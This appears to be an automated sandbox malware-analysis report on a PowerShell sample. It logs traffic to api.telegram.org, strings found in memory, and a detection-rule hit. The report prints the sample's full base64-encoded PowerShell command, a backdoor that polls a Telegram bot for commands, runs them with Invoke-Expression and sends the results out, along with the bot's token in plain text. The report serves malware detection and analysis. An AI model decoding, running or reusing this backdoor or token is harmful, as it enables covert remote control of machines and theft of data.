Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: powershell.exe, 00000005.00000002.3894525884.000001C84B386000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BA97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
Source: svchost.exe, 00000007.00000002.3716328092.000001BDE9E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.3894305093.000002AE05E3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3939204462.000002AE144EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3939204462.000002AE14622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3953240514.000001C859E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.3894305093.000002AE04471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C849C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.3894305093.000002AE05976000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000001.00000002.3894305093.000002AE04471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C849C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.3894525884.000001C84B896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B68F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B2C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B6F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BB27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B5CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B46B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BC1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BAF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BB5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BBF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BA75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B3C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BC3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BBBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
Source: powershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C849C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000005.00000002.3894525884.000001C84B896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B68F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B2C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B6F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BB27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B5CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B46B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B729000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BC1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BAF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BB5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BBF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BA75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B3C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84B8B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BC3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3894525884.000001C84BBBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=
Source: powershell.exe, 00000005.00000002.3894525884.000001C84B3C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124
Source: powershell.exe, 00000005.00000002.3894525884.000001C84B868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=9894443
Source: powershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0P
Source: powershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000007.00000003.2081812677.000001BDE9BB0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000005.00000002.3894525884.000001C849EC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.3894525884.000001C84A8C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.3894305093.000002AE05E3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3939204462.000002AE144EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3939204462.000002AE14622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3953240514.000001C859E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3953240514.000001C859D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000001.00000002.3894305093.000002AE05976000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.3894305093.000002AE05976000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: unknownNetwork traffic detected: HTTP traffic on port 64989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64977
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64979
Source: unknownNetwork traffic detected: HTTP traffic on port 64975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64976
Source: unknownNetwork traffic detected: HTTP traffic on port 64862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64975
Source: unknownNetwork traffic detected: HTTP traffic on port 64979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64990
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64791
Source: unknownNetwork traffic detected: HTTP traffic on port 64982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64989
Source: unknownNetwork traffic detected: HTTP traffic on port 64976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64980
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64985
Source: unknownNetwork traffic detected: HTTP traffic on port 64993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64987
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64986
Source: unknownNetwork traffic detected: HTTP traffic on port 64983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64991
Source: unknownNetwork traffic detected: HTTP traffic on port 64791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64993
Source: unknownNetwork traffic detected: HTTP traffic on port 64992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64995
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 64984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 64978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64995 -> 443
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49704 version: TLS 1.2

E-Banking Fraud

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQJump to behavior

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
